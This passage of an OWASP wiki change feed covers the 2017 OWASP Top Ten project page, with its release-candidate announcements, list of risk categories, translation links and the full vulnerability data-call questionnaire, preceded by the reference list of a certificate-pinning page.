* IETF [http://www.ietf.org/rfc/rfc4648.txt RFC 4648 (Base16, Base32, and Base64 Encodings)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc3279.txt RFC 3279 (PKI, X509 Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4055.txt RFC 4055 (PKI, X509 Additional Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc2246.txt RFC 2246 (TLS 1.0)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4346.txt RFC 4346 (TLS 1.1)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5246.txt RFC 5246 (TLS 1.2)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc6698.txt RFC 6698, Draft (DANE)]&lt;br /&gt;
* EFF [http://www.eff.org/sovereign-keys Sovereign Keys]&lt;br /&gt;
* Thoughtcrime Labs [http://convergence.io/ Convergence]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2125 PKCS#1, RSA Encryption Standard]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2128 PKCS#6, Extended-Certificate Syntax Standard]&lt;br /&gt;
* ITU [http://www.itu.int/rec/T-REC-X.690-200811-I/en Specification of Basic Encoding Rules (BER), Canonical Encoding Rules (CER) and Distinguished Encoding Rules (DER)]&lt;br /&gt;
* TOR Project [https://blog.torproject.org/blog/detecting-certificate-authority-compromises-and-web-browser-collusion Detecting Certificate Authority Compromises and Web Browser Collusion]&lt;br /&gt;
* Code Project [http://www.codeproject.com/Articles/25487/Cryptographic-Interoperability-Keys Cryptographic Interoperability: Keys]&lt;br /&gt;
* Google I/O [https://developers.google.com/events/io/sessions/gooio2012/107/ Security and Privacy in Android Apps]&lt;br /&gt;
* Trevor Perrin [https://crypto.stanford.edu/RealWorldCrypto/slides/perrin.pdf Transparency, Trust Agility, Pinning (Recent Developments in Server Authentication)]&lt;br /&gt;
* Dr. Peter Gutmann's [http://www.cs.auckland.ac.nz/~pgut001/pubs/pkitutorial.pdf PKI is Broken]&lt;br /&gt;
* Dr. Matthew Green's [http://blog.cryptographyengineering.com/2012/02/how-to-fix-internet.html The Internet is Broken]&lt;br /&gt;
* Dr. Matthew Green's [http://blog.cryptographyengineering.com/2012/03/how-do-interception-proxies-fail.html How do Interception Proxies fail?]&lt;br /&gt;
* Presentation: [http://www.slideshare.net/anantshri/ssl-pinning-and-bypasses-android-and-ios SSL Pinning implementation and bypasses for iOS and Android]&lt;br /&gt;
&lt;br /&gt;
= Authors and Primary Editors  =&lt;br /&gt;
&lt;br /&gt;
* Jeffrey Walton - jeffrey, owasp.org&lt;br /&gt;
* JohnSteven - john, owasp.org&lt;br /&gt;
* Jim Manico - jim, owasp.org&lt;br /&gt;
* Kevin Wall - kevin, owasp.org&lt;br /&gt;
* Ricardo Iramar - ricardo.iramar, owasp.org&lt;br /&gt;
&lt;br /&gt;
[[Category:Control]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=234519</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=234519"/>
				<updated>2017-10-20T21:16:28Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: 2017 RC2 announcement&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 RC2 Released==&lt;br /&gt;
RC2 is now [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf available for download]. In an ongoing effort to be transparent, we are asking for all comments to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issues list].&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
* All industry professionals are encouraged to complete this [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 &amp;lt;u&amp;gt;survey for new vulnerability categories&amp;lt;/u&amp;gt;] to help determine up to two items in the 2017 Top 10. The deadline for the survey is &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
* The data call for the 2017 Top 10 has been reopened. The  [https://goo.gl/forms/tLgyvK9O74r7wMkt2 &amp;lt;u&amp;gt;call for data&amp;lt;/u&amp;gt;] is now reopened to allow for additional data to be collected for analysis. The new deadline for the extended data call is &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html &amp;lt;u&amp;gt;OWASP blog posting&amp;lt;/u&amp;gt;] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ &amp;lt;u&amp;gt;OWASP Summit 2017&amp;lt;/u&amp;gt;], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html &amp;lt;u&amp;gt;outcomes of the OWASP Summit&amp;lt;/u&amp;gt;] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items (-&amp;gt; see OWASP Top 10 2017 - Industry survey open and data call reopened)&lt;br /&gt;
* Feedback on the mailing list has been moved to the [https://github.com/OWASP/Top10/issues &amp;lt;u&amp;gt;issues list&amp;lt;/u&amp;gt;] in GitHub, please continue to contribute feedback there. &lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 2 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
RC2 is available for download [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf from GitHub]. &lt;br /&gt;
&lt;br /&gt;
We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. &lt;br /&gt;
&lt;br /&gt;
We strongly urge for any corrections or issues to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issue list].&lt;br /&gt;
&lt;br /&gt;
Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.&lt;br /&gt;
&lt;br /&gt;
(We will be reaching out to translators shortly.)&lt;br /&gt;
&lt;br /&gt;
Andrew van der Stock&amp;lt;br/&amp;gt;&lt;br /&gt;
Brian Glas&amp;lt;br/&amp;gt;&lt;br /&gt;
Neil Smithline&amp;lt;br/&amp;gt;&lt;br /&gt;
Torsten Gigler&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information - for historical reference only==&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
